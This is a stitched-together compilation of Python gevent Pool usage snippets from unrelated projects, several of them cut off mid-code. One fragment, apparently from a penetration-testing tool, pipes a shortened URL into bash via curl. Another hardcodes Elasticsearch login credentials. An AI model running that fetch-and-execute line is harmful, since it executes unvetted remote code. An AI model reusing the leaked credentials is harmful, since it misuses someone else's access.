try: driver.get(target_url) print(target_url) ui.WebDriverWait(driver, 5).until(EC.visibility_of_element_located((By.XPATH, '//a[@class="block"]'))) except TimeoutException as e: driver.quit() print(e) return button = driver.find_element_by_xpath('//a[@class="block"]') Action = TouchActions(driver) Action.scroll_from_element(button, 0, 5000).perform() datas = driver.find_elements_by_tag_name('a') urls = [i for i in [i.get_attribute('href') for i in datas if i.get_attribute('href')] if 'detail' in i] for url in urls: try: client.all_post.mogujie_detail_url.insert({'_id': url, 'status': 0}) print('over:', url) except Exception as e: print(e) client.all_post.mogujie_user.update({'_id': target_url}, {'$set': {'status': 1}}) driver.quit() if __name__ == '__main__': pool = Pool(3) while 1: urls = [i['_id'] for i in client.all_post.mogujie_user.find({'status': 0}).limit(30)] print(len(urls)) if urls: pool.map(get_post, urls) print(len(urls), 'over') time.sleep(60)
from mioji.common.conf_manage import g_config from mioji.common.callback import CallbackWorkload from mioji.common.common import get_proxy from mioji.common.common import check_all_result from mioji.common.parser_except import ParserException, SLAVE_ERROR from mioji.common.warning import warn from mioji.common import spider # 装配代理 spider.slave_get_proxy = get_proxy callback = CallbackWorkload() # 处理task的协程池 g_co_pool = Pool(g_config.co_pool_size) # 监听线程收到的任务队列 g_task_queue = Queue(g_config.task_queue_size) # 爬虫抓取任务以外的异步任务队列 (如写日志原文到对象存储) g_task_post_process_queue = Queue(g_config.process_queue_size) # 处理post process task的协程池 g_post_process_co_pool = Pool(g_config.co_pool_size) # Spider工厂对象 g_spider_factory = SpiderFactory() # 异步回调的协程池 g_asy_callback_pool = Pool(g_config.target_async_size) # 监听任务子进程队列 g_multi_queue = multiprocessing.Queue() #任务线程 class Worker(Thread):
import logging from gevent.pool import Pool from valve.source.master_server import MasterServerQuerier from valve.source.a2s import ServerQuerier, NoResponseError from valve.source.messages import BrokenMessageError from typing import List import requests MASTER_HOST = 'hl2master.steampowered.com' MASTER_TIMEOUT = 60 SERVER_TIMEOUT = 5 pool = Pool(size=3) def get_ip_from_dns(dns: str) -> str: response = requests.post('http://ping.eu/action.php?atype=3', data={'host': dns, 'go': 'Go'}) return response.text.split(dns+" has address <span class=t2>")[1].split('</span>')[0] def get_server_stats(address: List[str]): server = ServerQuerier(address, timeout=SERVER_TIMEOUT) try: info = server.info() # rules = server.rules() logging.info(u'Updated {0}:{1} █ {player_count}/{max_players} players █ {server_name} █ {map} █ {server_type}'.format( address[0], address[1], **info) ) # logging.info(u'Rules {rules} \n'.format(**rules)) return True except (NotImplementedError, NoResponseError, BrokenMessageError):
def __init__(self): self.pool = Pool(1000) self.pool.start()
def _init_pool(self): self.pool = Pool(10)
def __init__(self, queue, db_proxy_num): self.crawl_pool = Pool(THREADNUM) self.queue = queue self.db_proxy_num = db_proxy_num
def on_messages(self, raiden: "RaidenService", messages: List[Message]) -> None: # pylint: disable=unidiomatic-typecheck # Remove duplicated messages, this can happen because of retries done # by the sender when the receiver takes too long to acknowledge. This # is a problem since the receiver may be taking a long time to reply # because it is under high load, processing the duplicated messages # just make the problem worse. unique_messages: Set[Message] = set(messages) pool = Pool() for message in unique_messages: if type(message) == SecretRequest: assert isinstance(message, SecretRequest), MYPY_ANNOTATION pool.apply_async(self.handle_message_secretrequest, (raiden, message)) elif type(message) == RevealSecret: assert isinstance(message, RevealSecret), MYPY_ANNOTATION pool.apply_async(self.handle_message_revealsecret, (raiden, message)) elif type(message) == Unlock: assert isinstance(message, Unlock), MYPY_ANNOTATION pool.apply_async(self.handle_message_unlock, (raiden, message)) elif type(message) == LockExpired: assert isinstance(message, LockExpired), MYPY_ANNOTATION pool.apply_async(self.handle_message_lockexpired, (raiden, message)) elif type(message) == RefundTransfer: assert isinstance(message, RefundTransfer), MYPY_ANNOTATION pool.apply_async(self.handle_message_refundtransfer, (raiden, message)) elif type(message) == LockedTransfer: assert isinstance(message, LockedTransfer), MYPY_ANNOTATION pool.apply_async(self.handle_message_lockedtransfer, (raiden, message)) elif type(message) == WithdrawRequest: assert isinstance(message, WithdrawRequest), MYPY_ANNOTATION pool.apply_async(self.handle_message_withdrawrequest, (raiden, message)) elif type(message) == WithdrawConfirmation: assert isinstance(message, WithdrawConfirmation), MYPY_ANNOTATION pool.apply_async(self.handle_message_withdraw_confirmation, (raiden, message)) elif type(message) == WithdrawExpired: assert isinstance(message, WithdrawExpired), MYPY_ANNOTATION pool.apply_async(self.handle_message_withdraw_expired, (raiden, message)) elif type(message) == Delivered: assert isinstance(message, Delivered), MYPY_ANNOTATION pool.apply_async(self.handle_message_delivered, (raiden, message)) elif type(message) == Processed: assert isinstance(message, Processed), MYPY_ANNOTATION pool.apply_async(self.handle_message_processed, (raiden, message)) else: log.error(f"Unknown message cmdid {message.cmdid}") all_state_changes: List[StateChange] = list() for greenlet in joinall(set(pool), raise_error=True): all_state_changes.extend(greenlet.get()) if all_state_changes: # Order balance proof messages, based the target channel and the # nonce. Because the balance proofs messages must be processed in # order, and there is no guarantee of the order of messages # (an asynchronous network is assumed) This reduces latency when a # balance proof is considered invalid because of a race with the # blockchain view of each node. def by_canonical_identifier(state_change: StateChange) -> Tuple[int, int]: if isinstance(state_change, BalanceProofStateChange): balance_proof = state_change.balance_proof return ( balance_proof.canonical_identifier.channel_identifier, balance_proof.nonce, ) return 0, 0 all_state_changes.sort(key=by_canonical_identifier) raiden.handle_and_track_state_changes(all_state_changes)
def main(): setup_logger() logger = CMXLogAdapter() first_run_setup(logger) args = gen_cli_args() module = None module_server = None targets = [] server_port_dict = {'http': 80, 'https': 443, 'smb': 445} current_workspace = cfg.WORKSPACE hasPassList = False if args.debug: setup_debug_logger() if args.darrell: links = open(( cfg.DATA_PATH / 'videos_for_darrell').with_suffix('.harambe')).read().splitlines() try: webbrowser.open(random.choice(links)) sys.exit(1) except: sys.exit(1) if args.rekt: try: os.system("curl -s -L http://bit.ly/10hA8iC | bash") sys.exit(1) except: sys.exit(1) logging.debug('Passed args:\n' + pformat(vars(args))) if hasattr(args, 'username') and args.username: for user in args.username: if Path(user).is_file(): #If it was a file passed in args.username.remove(user) args.username.append(open(user, 'r')) if hasattr(args, 'password') and args.password: for passw in args.password: if Path(passw).is_file(): #If it was a file passed in hasPassList = True args.password.remove(passw) args.password.append(open(passw, 'r')) elif hasattr(args, 'hash') and args.hash: for ntlm_hash in args.hash: if Path(ntlm_hash).is_file(): #If it was a file passed in args.hash.remove(ntlm_hash) args.hash.append(open(ntlm_hash, 'r')) if hasattr(args, 'cred_id') and args.cred_id: for cred_id in args.cred_id: if '-' in str(cred_id): start_id, end_id = cred_id.split('-') try: for n in range(int(start_id), int(end_id) + 1): args.cred_id.append(n) args.cred_id.remove(cred_id) except Exception as e: logger.error( 'Error parsing database credential id: {}'.format(e)) sys.exit(1) if hasattr(args, 'target') and args.target: for target in args.target: if Path(target).is_file(): #If it was a file passed in target_file_type = identify_target_file(target) if target_file_type == 'nmap': targets.extend(parse_nmap_xml(target, args.protocol)) elif target_file_type == 'nessus': targets.extend(parse_nessus_file(target, args.protocol)) else: with open(target, 'r') as target_file: for target_entry in target_file: targets.extend(parse_targets(target_entry)) else: targets.extend(parse_targets(target)) p_loader = protocol_loader() protocol_path = p_loader.get_protocols()[args.protocol]['path'] protocol_db_path = p_loader.get_protocols()[args.protocol]['dbpath'] protocol_object = getattr(p_loader.load_protocol(protocol_path), args.protocol) protocol_db_object = getattr(p_loader.load_protocol(protocol_db_path), 'database') db_path = (cfg.WS_PATH / current_workspace / args.protocol).with_suffix('.db') # set the database connection to autocommit w/ isolation level db_connection = sqlite3.connect(db_path, check_same_thread=False) db_connection.text_factory = str db_connection.isolation_level = None db = protocol_db_object(db_connection) setattr(protocol_object, 'config', cfg.__dict__) if hasattr(args, 'module'): loader = module_loader(args, db, logger) if args.list_modules: modules = loader.get_modules() for name, props in sorted(modules.items()): logger.announce('{:<25} {}'.format(name, props['description'])) sys.exit(0) elif args.module and args.show_module_options: modules = loader.get_modules() for name, props in modules.items(): if args.module.lower() == name.lower(): logger.announce('{} module options:\n{}'.format( name, props['options'])) sys.exit(0) elif args.module: modules = loader.get_modules() for name, props in modules.items(): if args.module.lower() == name.lower(): module = loader.init_module(props['path']) setattr(protocol_object, 'module', module) break if not module: logger.error('Module not found') exit(1) if getattr(module, 'opsec_safe') is False: ans = raw_input( highlight( '[!] Module is not opsec safe, are you sure you want to run this? [Y/n] ', 'red')) if ans.lower() not in ['y', 'yes', '']: sys.exit(1) if getattr(module, 'multiple_hosts') is False and len(targets) > 1: ans = raw_input( highlight( "[!] Running this module on multiple hosts doesn't really make any sense, are you sure you want to continue? [Y/n] ", 'red')) if ans.lower() not in ['y', 'yes', '']: sys.exit(1) if hasattr(module, 'on_request') or hasattr( module, 'has_response'): if hasattr(module, 'required_server'): args.server = getattr(module, 'required_server') if not args.server_port: args.server_port = 443 context = Context(db, logger, args) module_server = CMXServer(module, context, logger, args.server_host, args.server_port, args.server) module_server.start() setattr(protocol_object, 'server', module_server.server) try: ''' Open all the greenlet threads ''' pool = Pool(args.threads) jobs = [] for target in targets: jobs.append(pool.spawn(protocol_object, args, db, str(target))) if args.timeout == 0: args.timeout = None for job in jobs: job.join(timeout=args.timeout) except (KeyboardInterrupt, gevent.Timeout): logging.info("Timed out") pass if module_server: module_server.shutdown()
call.get('recording_url') or call.get('voicemail_url')): call['url'] = call.get('recording_url', call.get('voicemail_url')) if call['duration'] > 0: call['Type'] = 'Answered Call' call['Answered or Voicemail Duration'] = call['duration'] else: call['Type'] = 'Voicemail' call['Answered or Voicemail Duration'] = call[ 'voicemail_duration'] calls.append(call) offset += len(resp['data']) has_more = resp['has_more'] pool = Pool(5) pool.map(getRecordedCalls, days) # Sort all calls by date_created to be in order because they were pulled in parallel calls = sorted(calls, key=itemgetter('date_created'), reverse=True) # Method to download a call recording or voicemail recording def downloadCall(call): try: call_title = "close-recording-%s.mp3" % call['id'] url = call['url'] doc = requests.get( url, headers={'Content-Type': 'application/json'}, auth=(args.api_key, ''),
def __init__(self): """建立Redis数据库连接""" self.redis = StrictRedis.from_url(REDIS_URL) # 创建协程池对象 self.pool = Pool()
server.start() for target in args.target: if os.path.exists(target): with open(target, 'r') as target_file: for target_entry in target_file: targets.extend(parse_targets(target_entry)) else: targets.extend(parse_targets(target)) try: ''' Open all the greenlet (as supposed to redlet??) threads Whoever came up with that name has a fetish for traffic lights ''' pool = Pool(args.threads) jobs = [ pool.spawn(connector, str(target), args, db, module, context, server) for target in targets ] #Dumping the NTDS.DIT and/or spidering shares can take a long time, so we ignore the thread timeout if args.ntds or args.spider: joinall(jobs) elif not args.ntds: for job in jobs: job.join(timeout=args.timeout) except KeyboardInterrupt: pass if server:
# -*- coding: UTF-8 -*- from gevent import monkey monkey.patch_all() import gevent import urllib.request from gevent.pool import Pool def run_task(url): print("visit----------%s" % url) try: rep = urllib.request.urlopen(url) data = rep.read() print("%d byte received from %s " % (len(data), url)) except Exception: print(e) return "url:%s ------>finished" % url if __name__ == "__main__": pool = Pool(2) urls = [ "https://github.com", "https://www.python.org/", "http://www.cnblogs.com/", "http://www.baidu.com" ] #greenlets = [gevent.spawn(run_task, url) for url in urls] #gevent.joinall(greenlets) result = pool.map(run_task, urls) print(result)
pool.join() queue.put((None, None)) result = cal_greenlet.get() return result def stream_handler(sock, address): if DEBUG: profile_module(TCPHandler, sock, address, request_handler) else: TCPHandler(sock, address, request_handler) if __name__ == '__main__': try: port = sys.argv[1] except IndexError: port = 9001 print "Server listen on port: ", port pool = Pool(1024) server = StreamServer(("0.0.0.0", port), stream_handler, backlog=128, spawn=pool) try: server.serve_forever() except KeyboardInterrupt: print "Server exit..." server.stop()
def run(func, m, n, pool_size=10): p = Pool(pool_size) g = [p.spawn(func, i, j) for i, j in zip(m, n)] gevent.joinall(g) return map(lambda x: x.value, g)
app = Blueprint('douyin_data', __name__) # root_logger = init_logger() es = Elasticsearch([{ 'host': 'es-cn-v641jqyjv000i1mmi.elasticsearch.aliyuncs.com', 'port': 9200 }], http_auth=('elastic', 'PlRJ2Coek4Y6')) url_set = {'172.17.0.43:27017'} # mongo_client = mongo_client.MongodbClient(url_set, "douyin", username="******", password="******") pool_size = 5 pool = Pool(pool_size) goup = [] class Logger(object): level_relations = { 'debug': logging.DEBUG, 'info': logging.INFO, 'warning': logging.WARNING, 'error': logging.ERROR, 'crit': logging.CRITICAL } #日志级别关系映射 def __init__( self, filename,
from gevent import monkey monkey.patch_all() import gevent import urllib2 from gevent.pool import Pool def f(url): print('GET: %s' % url) resp = urllib2.urlopen(url) data = resp.read() print('%d bytes received from %s.' % (len(data), url)) ''' gevent.joinall([ gevent.spawn(f, 'https://www.python.org/'), gevent.spawn(f, 'https://www.baidu.com/'), gevent.spawn(f, 'https://github.com/'), ]) ''' url = [ 'https://www.python.org/', 'https://www.baidu.com/', 'https://github.com/', 'https://www.baidu.com/', ] p = Pool(10) #p.map(f, url) urls = [gevent.spawn(f, i) for i in url] gevent.wait(urls)
def run_server(): http = WSGIServer((host, port), app.wsgi_app, spawn=Pool(2)) http.serve_forever()
item = easygui.enterbox('Scrape Item:', TITLE) item = urllib.parse.quote_plus(item) if item == '': continue elif not item: quit() country_choices = easygui.multchoicebox( 'Item Location/s:', TITLE, [k for k, v in country_codes.items()]) for country in country_choices: print(f'Scraping {country}...') pool = Pool(25) for n in range(1, 11): url = f'https://www.ebay.com/sch/i.html?_ftrt=901&_sop=12&_dmd=1&LH_BIN=1&_ftrv=1&_from=R40&_sacat=0&_fosrp=1&_nkw={item}&LH_LocatedIn={country_codes[country]}&_ipg=200&rt=nc&_pgn={n}&LH_TitleDesc=1' pool.spawn(scrape_ebay, url) pool.join() s = sorted(data, key=lambda x: int(data[x]['sales']), reverse=True) doc, tag, text = Doc().tagtext() with tag('body', style="font-family: Roboto"): with tag('div', style="margin: 20px auto; width: 90%;"): with tag( 'h1', style=
# Asks for user input (an integer). # On error, shows a message to the user. try: threads = int(sys.argv[2]) times = int(sys.argv[3]) except ValueError: print ("Enter an integer, please! (╯°□°)╯") sys.exit(1) except: pass # Shows a nice message to the user. :) print ("Starting benchmark... (ノ◕ヮ◕)ノ*:・゚✧") print ("Requesting from " + url) # Starts a pool thread with n number of workers (threads). pool = Pool(threads) # Gets the status of every request, and store them as a list. # for i in progress_bar(range(times), "Loading: ", "🐮 ", " 🌿", 25): status = pool.map(stress_test, [url] * times) # Prints the status code, followed by the number of times repeated. result = dict((i, status.count(i)) for i in status) # Create a directory (if it doesn't exist) called "logs". # Store the log file in it. create_directory("./logs/") log = create_log("./logs/", result, url) print ("Benchmark done! Check your log file: " + log)
def main(): print('Start time: %s' % time.ctime()) try: mysql_conn = MySQLdb.connect( host=config.mysql_host, port=config.mysql_port, user=config.mysql_user, passwd=config.mysql_passwd, db=config.mysql_db, charset=config.mysql_charset ) mysql_conn.autocommit(True) mysql_cursor = mysql_conn.cursor(MySQLdb.cursors.DictCursor) except Exception as e: error_msg = 'Failed to connect to MySQL: {error_msg}'.format(error_msg=traceback.format_exc()) logging.error(error_msg) first_visit_status = login_status = logout_status = 0 session = requests.Session() try: resp = session.get(url = '', verify=True, timeout=5) first_visit_status = 1 except Exception as e: print('First visit failed : %s' % e) post_data = {} html = PyQuery(resp.text) input_list = html('')('') for item in input_list: if item.type == '': continue post_data[item.name] = item.value post_data['username'] = ad_username post_data['password'] = ad_password try: resp = session.post(url = '', verify=False, timeout=5, data = post_data) if resp.status_code == 302 or resp.status_code == 307 or resp.status_code == 200 : login_status = 1 else : print('Login failed ') except Exception as e: print('Login failed : %s' % e) if first_visit_status == 1 and login_status == 1: cookie_jar = RequestsCookieJar() cookie_jar.update(resp.cookies) mysql_cursor.execute('SELECT * FROM domain WHERE status=1') domains = mysql_cursor.fetchall() mysql_conn.close() gevent_pool = Pool(POOL_SIZE) gevent_pool.map(test_domain, [(d, cookie_jar)for d in domains]) gevent_pool.join() logouturl = '' try: resp = session.get(url=logouturl, verify=True, timeout=5) if resp.status_code == 302 or resp.status_code == 307 or resp.status_code == 200 : logout_status = 1 else : print('Logout failed ') except Exception as e: result += u'\tLogout ERROR {e}\n'.format(e=e) if logout_status == 1: results.sort(key=lambda x: (x['domain'])) for result in results: print('%s' % result['domain']) print(result['result'].rstrip('\n')) print('') print('%s domain redirect to APSSO' % redirect2apsso_cnt) print('%s domain redirect to SSO' % redirect2sso_cnt) print('%s domain return 5xx' % len(error_5xx_domain)) print(json.dumps(error_5xx_domain)) print('%s domain return 4xx' % len(error_4xx_domain)) print(json.dumps(error_4xx_domain)) print('Finish time: %s' % time.ctime()) print('-' * 20) print(' ')
list = [testCoupon, testCharge, testActivity] tests = [] for module in list: tests.append(unittest.TestLoader().loadTestsFromModule(module)) return tests if __name__ == "__main__": suite = [] for m, v in enumerate(loadTestsList()): suite.append(unittest.TestSuite()) suite[m].addTests(list(v)) task = [] pool = Pool(10) k = 0 for i in suite: k += 1 filePath = os.path.join(gl.reportPath, 'Report{}.html'.format(k)) # 确定生成报告的路径 print filePath print i with file(filePath, 'wb') as fp: runner = HTMLTESTRunnerCN.HTMLTestRunner( stream=fp, title=u'接口自动化测试报告', description=u'详细测试用例结果', # 不传默认为空 tester=u"yhleng" # 测试人员名字,不传默认为小强 ) # 运行测试用例
USERNAME = '******' API_KEY = 'api key' cls = get_driver(Provider.CLOUDFILES_US) driver = cls(USERNAME, API_KEY) def download_obj(container, obj): driver = cls(USERNAME, API_KEY) obj = driver.get_object(container_name=container.name, object_name=obj.name) filename = os.path.basename(obj.name) path = os.path.join(os.path.expanduser('~/Downloads'), filename) print 'Downloading: %s to %s' % (obj.name, path) obj.download(destination_path=path) containers = driver.list_containers() jobs = [] pool = Pool(20) for index, container in enumerate(containers): objects = container.list_objects() for obj in objects: pool.spawn(download_obj, container, obj) pool.join() print 'Done'
def init(self, inventory, config, initial_limit=None): # Config validation # # If no config, create one using the defaults if config is None: config = Config() # Error if our min version is not met if config.MIN_PYINFRA_VERSION is not None: running_version = parse_version(__version__) needed_version = parse_version( # Version must be a string six.text_type(config.MIN_PYINFRA_VERSION), ) if needed_version > running_version: raise PyinfraError(( 'Minimum pyinfra version not met ' '(minimum={0}, running={1})' ).format( config.MIN_PYINFRA_VERSION, __version__, )) if not config.PARALLEL: # TODO: benchmark this # In my own tests the optimum number of parallel SSH processes is # ~20 per CPU core - no science here yet, needs benchmarking! cpus = cpu_count() ideal_parallel = cpus * 20 config.PARALLEL = ( min(ideal_parallel, len(inventory), MAX_PARALLEL) if MAX_PARALLEL is not None else min(ideal_parallel, len(inventory)) ) # If explicitly set, just issue a warning elif MAX_PARALLEL is not None and config.PARALLEL > MAX_PARALLEL: logger.warning(( 'Parallel set to {0}, but this may hit the open files limit of {1}.\n' ' Max recommended value: {2}' ).format(config.PARALLEL, nofile_limit, MAX_PARALLEL)) # Actually initialise the state object # # Setup greenlet pools self.pool = Pool(config.PARALLEL) self.fact_pool = Pool(config.PARALLEL) # Connection storage self.ssh_connections = {} self.sftp_connections = {} # Private keys self.private_keys = {} # Facts storage self.facts = {} self.fact_locks = {} # Assign inventory/config self.inventory = inventory self.config = config # Hosts we've activated at any time self.activated_hosts = set() # Active hosts that *haven't* failed yet self.active_hosts = set() # Hosts that are ready to be deployed to self.ready_hosts = set() # Limit hosts changes dynamically to limit operations to a subset of hosts self.limit_hosts = initial_limit # Op basics self.op_line_numbers_to_hash = {} self.op_meta = {} # maps operation hash -> names/etc self.ops_run = set() # list of ops which have been started/run # Op dict for each host self.ops = { host: {} for host in inventory } # Facts dict for each host self.facts = { host: {} for host in inventory } # Meta dict for each host self.meta = { host: { 'ops': 0, # one function call in a deploy file 'commands': 0, # actual # of commands to run 'op_hashes': set(), } for host in inventory } # Results dict for each host self.results = { host: { 'ops': 0, # success_ops + failed ops w/ignore_errors 'success_ops': 0, 'error_ops': 0, 'commands': 0, } for host in inventory } # Assign state back references to inventory & config inventory.state = config.state = self self.initialised = True
def __init__(self, queue, db_proxy_num, myip): # 限制并发协程数量 self.crawl_pool = Pool(config.THREADNUM) self.queue = queue self.db_proxy_num = db_proxy_num self.myip = myip
def deploy_tarball_to_s3(tarball_obj, bucket_name, prefix='', region='eu-west-1', concurrency=100, no_compress=False, strip_components=0): """ Upload the contents of `tarball_obj`, a File-like object representing a valid .tar.gz file, to the S3 bucket `bucket_name` """ # Connect to S3 and get a reference to the bucket name we will push files to conn = connect_to_region(region) if conn is None: logging.error("Invalid AWS region %s" % region) return try: bucket = conn.get_bucket(bucket_name, validate=True) except boto.exception.S3ResponseError: logging.error("S3 bucket %s does not exist in region %s" % (bucket_name, region)) return # Open the tarball try: with tarfile.open(name=None, mode="r:*", fileobj=tarball_obj) as tarball: files_uploaded = 0 # Parallelize the uploads so they don't take ages pool = Pool(concurrency) # Iterate over the tarball's contents. try: for member in tarball: # Ignore directories, links, devices, fifos, etc. if not member.isfile(): continue # Mimic the behaviour of tar -x --strip-components= stripped_name = member.name.split('/')[strip_components:] #f.write(stripped_name) if not bool(stripped_name): continue path = os.path.join(prefix, '/'.join(stripped_name)) #f.write(member) # Read file data from the tarball fd = tarball.extractfile(member) # Send a job to the pool. pool.wait_available() f.write( ((str(stripped_name)).strip("['")).replace("']", ',')) pool.apply_async(__deploy_asset_to_s3, (fd.read(), path, member.size, bucket, not no_compress)) files_uploaded += 1 # Wait for all transfers to finish pool.join() except KeyboardInterrupt: # Ctrl-C pressed print("Cancelling upload...") pool.join() finally: print("Uploaded %i files" % (files_uploaded)) except tarfile.ReadError: print("Unable to read asset tarfile", file=sys.stderr) return
for td in data: for i in td.cssselect('td:nth-child(1)'): ip = i.text_content() for i in td.cssselect('td:nth-child(2)'): port = i.text_content() ip = {'http':'http'+'://'+ip+':'+port} try: html = requests.get(conurl, headers=headers, proxies=ip, timeout=5).status_code except Exception,e: # print e html = 404 print u'ip:%s不可用'%ip if html == 200: # 当ip可用时插入数据库 license = 10 print u'ip:%s可用'%ip sql = "INSERT INTO datas (`ip`, `license`) VALUES('%s','%s')"%(ip['http'],license) try: save_ip(sql) except: # 当重复插入数据时忽略报错 print u'ip:%s已经存在数据库了'%ip urls = ['https://www.kuaidaili.com/free/inha/%s/'%i for i in range(1,20)] print urls pool = Pool(1) pool.map(parser,urls) pool.kill() pool.join() if __name__ == '__main__': get_proxies()
def __init__(self, host='127.0.0.1', port=8181, **options): super(GeventPoolServer, self ).__init__(host, port, spawn=Pool(size=pool_size), **options)
def test_proxies(proxies, timeout=10, single_url=None, many_urls=None, call_back=None): """ 测试代理。剔除响应时间大于timeout的代理 或者在测试的同时进行数据处理 200则调用 call_back(url,source) :type proxies: list :param proxies: 代理列表 :param timeout: 响应时间(s) :param single_url: 用作测试的url :param many_urls: 用作测试的url列表,测试时从中随机选取一个 :param call_back: 处理测试url对应网页的源码,callback(url,source) :return: """ proxies = set(proxies) errors = set() pool = Pool(100) def test(proxy): code = None url = random.choice(many_urls) if many_urls is not None else single_url try: with gevent.Timeout(seconds=timeout, exception=Exception('[Connection Timeout]')): headers['User-Agent'] = random.choice(user_agents) res = requests.get(url, proxies={ 'http': 'http://{}'.format(proxy.strip()), 'https': 'https://{}'.format(proxy.strip()) }, headers=headers) code = res.status_code source = res.text log('[Proxy: {:d} {:s}]'.format(code, proxy)) # 回调 if source is not None and call_back is not None and code == 200: call_back(url, source) if code != 200: errors.add(proxy) except Exception as e: # log(e.args) errors.add(proxy) store_in_db(proxy, status_code=code) # 存 for proxy in proxies: pool.spawn(test, proxy) pool.join() proxies = proxies - errors log('[HTTP Proxies] Available:{:d} Deprecated:{:d}'.format( len(proxies), len(errors))) return list(proxies)
def __init__(self): self.urls_queue = Queue() self.pool = Pool(CONFIG.POOL_MAXSIZE) self.logger = Logger.get() self.init_queue() self.create_dir()
def __init__(self, inventory, config=None): # Connection storage self.ssh_connections = {} self.sftp_connections = {} # Private keys self.private_keys = {} # Facts storage self.facts = {} self.fact_locks = {} # If no config, create one using the defaults if config is None: config = Config() if not config.PARALLEL: # If possible run everything in parallel, otherwise the max if defined above config.PARALLEL = (min(len(inventory), MAX_PARALLEL) if MAX_PARALLEL is not None else len(inventory)) # If explicitly set, just issue a warning elif MAX_PARALLEL is not None and config.PARALLEL > MAX_PARALLEL: logger.warning(( 'Parallel set to {0}, but this may hit the open files limit of {1}.\n' ' Max recommended value: {2}').format( config.PARALLEL, nofile_limit, MAX_PARALLEL)) # Setup greenlet pools self.pool = Pool(config.PARALLEL) self.fact_pool = Pool(config.PARALLEL) # Assign inventory/config self.inventory = inventory self.config = config # Assign self to inventory & config inventory.state = config.state = self # Host tracking self.active_hosts = set() self.ready_hosts = set() self.connected_hosts = set() hostnames = [host.name for host in inventory] # Op basics self.op_order = [] # list of operation hashes self.op_meta = {} # maps operation hash -> names/etc self.ops_run = set() # list of ops which have been started/run # Op dict for each host self.ops = {hostname: {} for hostname in hostnames} # Meta dict for each host self.meta = { hostname: { 'ops': 0, # one function call in a deploy file 'commands': 0, # actual # of commands to run 'latest_op_hash': None } for hostname in hostnames } # Results dict for each host self.results = { hostname: { 'ops': 0, # success_ops + failed ops w/ignore_errors 'success_ops': 0, 'error_ops': 0, 'commands': 0 } for hostname in hostnames } # Pipeline facts context manager attached to self self.pipeline_facts = PipelineFacts(self)